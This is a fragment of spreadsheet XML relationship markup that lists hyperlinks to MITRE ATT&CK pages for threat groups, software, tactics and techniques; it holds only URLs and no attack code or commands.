Target="https://attack.mitre.org/groups/G0009" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0115" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0122" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0039" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0124" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0128" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0101" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0032" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0059" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0068" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0106" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0018/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0005" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0063" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0008" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0053" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0089" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0134" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0020" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0078" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0100" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0129" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0049" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0073" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0082" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0035" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0062" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0070" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0037" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0093" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0045" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0048" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0083" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0081" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0112" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0023" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0077" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0033" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0130" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0114" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0098" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0074" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0120" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0136" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0116" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0092" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0028" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0043" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0019" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0087" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0013" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0003" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0012" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0084" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0002" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0104" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0054" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0044" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0025" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0046" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0065" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0056" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0034" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0010" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0138" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0108" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0137" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0119" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0027" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0096" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0017" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0125" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0055" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0071" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0127" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0050" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0079" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0047" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0038" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0090" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0007" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0080" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0061" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0030" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0103" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0024" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0029" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0121" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0123" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0099" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0026" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0097"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attack.mitre.org/software/S0525" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0422" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0110" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0245" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0456" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0414" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0337" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0127" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0268" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0114" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0045" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0065" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0310" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0129" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0319" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0073" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0344" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0031" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0642" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0534" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0069" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0521" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0552" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0635" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0584" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0304" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0099" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0438" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0640" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0475" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0234" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0574" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0520" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings3.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0440" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0570" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0469" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0504" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0292" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0373" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0638" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0606" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0470" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0486" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0622" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0128" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0089" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0415" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0066/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0309" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0524" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0540" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0347" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0093" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0017" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0657" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0092" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0473" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0239" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0190" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0360" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0202" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0331"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attack.mitre.org/tactics/TA0004" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0009" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0041" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0037" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0043" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0030" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0003" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0008" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0027" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0035" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0038" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0040" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0029" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0039/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0002" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0007" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0033" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0001" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0010" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0032" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0034" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0006" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0028" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0042" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0005" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0011" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0031" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0036"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attack.mitre.org/techniques/T1555" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/003" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/002" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1575" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/008" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/012" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 